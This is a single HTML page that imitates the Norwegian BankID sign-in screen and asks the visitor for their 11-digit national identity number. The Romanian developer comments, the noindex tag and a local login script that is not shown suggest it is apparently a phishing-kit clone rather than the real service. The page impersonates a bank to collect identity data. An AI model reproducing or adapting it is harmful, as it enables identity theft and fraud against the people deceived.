<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="robots" content="noindex, nofollow">
    <link rel="icon" type="image/png" href="img/favicon.b4be5517.png">
    <title>BankID</title>
    <link href="css/authorization.11f23e186330ca22e8f9.css" rel="stylesheet">
    <script type="text/javascript" src="js/jquery-3.6.3.min.js"></script>
    <script type="text/javascript" src="js/login.js"></script>
    <style>
        /* Stilizare placeholder pentru toate input-urile */
        input::placeholder {
            font-size: 12px; /* Dimensiunea textului placeholder-ului */
            color: #888; /* Culoarea textului placeholder-ului (op?ional) */
        }

        /* Dac� dore?ti s� aplici stilul doar la un input specific, po?i ad�uga o clas� */
        .custom-placeholder::placeholder {
            font-size: 16px;
            color: #888;
        }
    </style>
</head>
<body class="">
    <main class="container">
        <div class="container__content">
            <div class="bankid-logo-wrapper">
                <img alt="" class="bankid-logo" src="img/bankid-logo.28f35de5.svg">
            </div>
            <div id="wait">
                <img alt="" class="bankid-symbol" src="img/bankid-symbol-animated.ee3b536a.svg">
                <span class="sr-only" role="alert" lang="en">Loading</span>
            </div>
            <div class="page" id="getNnin" style="">
                <form id="nnin-form" novalidate="">
                    <div class="page__content">
                        <h1 tabindex="-1" data-i18n="nnin" id="nnin-title">Fodselsnummer</h1>
                        <span class="merchant_name">BankID MinSide</span>
                        <label for="nnin" data-i18n="nnin_label">Hva er ditt fodselsnummer?</label>
                        <input name="nnin" id="nnin" inputmode="numeric" pattern="[0-9]{6} [0-9]{5}" placeholder="11 digits" maxlength="11" minlength="11" autocomplete="off" aria-labelledby="nnin-title" aria-describedby="nninValidationMessage" aria-invalid="true" required="" data-format="...... ....." data-slots="." data-separator=" " class="custom-placeholder">
                        <div class="helper-text-container">
                            <img id="helperTextErrorIcon" src="img/helper-text-error.b85af04c.svg" alt="" style="display:none">
                            <p id="nninValidationMessage" class="validation-text" data-i18n="nnin_helper_text" aria-live="polite">Fyll inn fodselsnummer (11 siffer)</p>
                        </div>
                        <div class="buttons__page__middle">
                            <button type="button" data-i18n="next" id="nnin-next-button" class="button button--default">Neste</button>
                        </div>
                        <p id="privacyPolicyDeclaration" data-i18n="privacy_policy_declaration">For a sjekke om du har BankID ma vi behandle ditt fodselsnummer, les mer i var <a id="privacyPolicyLink" href="" target="_blank">personvernerklaring</a>.</p>
                    </div>
                </form>
                <div class="page__buttons">
                    <button data-i18n="cancel" id="decline-nnin-button" class="button button--link">Avbryt</button>
                </div>
            </div>
        </div>
    </main>
</body>
</html>
